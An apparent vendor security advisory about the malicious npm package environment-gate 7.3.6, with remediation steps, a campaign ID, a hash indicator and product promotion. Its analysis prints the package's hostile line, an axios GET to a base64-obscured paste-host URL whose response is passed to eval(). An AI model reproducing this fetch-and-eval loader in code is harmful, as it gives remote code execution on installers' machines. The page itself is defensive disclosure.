Which versions of environment-gate are malicious?

The following npm versions of environment-gate are flagged malicious: 7.3.6. Treat any of these as compromised.

How do I remediate environment-gate if I installed it?

Remove environment-gate from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is environment-gate part of a known attack campaign?

Yes — environment-gate is associated with the IN-MAL-2026-006373 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect environment-gate in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking environment-gate and packages like it before any post-install script runs.

Malicious package

environment-gatenpm

Malicious code in environment-gate (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5743

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall environment-gate

What this malware does

The package's only export, gate(), performs an HTTP GET to a base64-obfuscated URL (https://www.jsonkeeper.com/b/VKUNI) and passes the response body directly to eval(). The destination is an anonymous, mutable JSON paste host whose contents the author can change at any moment, so any caller of the documented gate() API executes arbitrary remote JavaScript in the installer's Node.js process — full remote code execution. The base64 wrapping of the URL and the cover-story description ('utility to await multiple asynchronous calls') with no repo, empty author field, and a single-file payload are consistent with a throwaway malicious package. index.js line 2: require('axios').get(atob('...')).then(r => {eval(r.data.content)}).

Malicious versions

1 flagged

7.3.6

Indicators of compromise (SHA-256)

48e4ad756dbae70bb38049d363961eb27239c7cf18c6a92612579aeb818da7b1

Frequently asked questions

No. environment-gate on npm has been identified as a malicious package (version 7.3.6 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006373

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection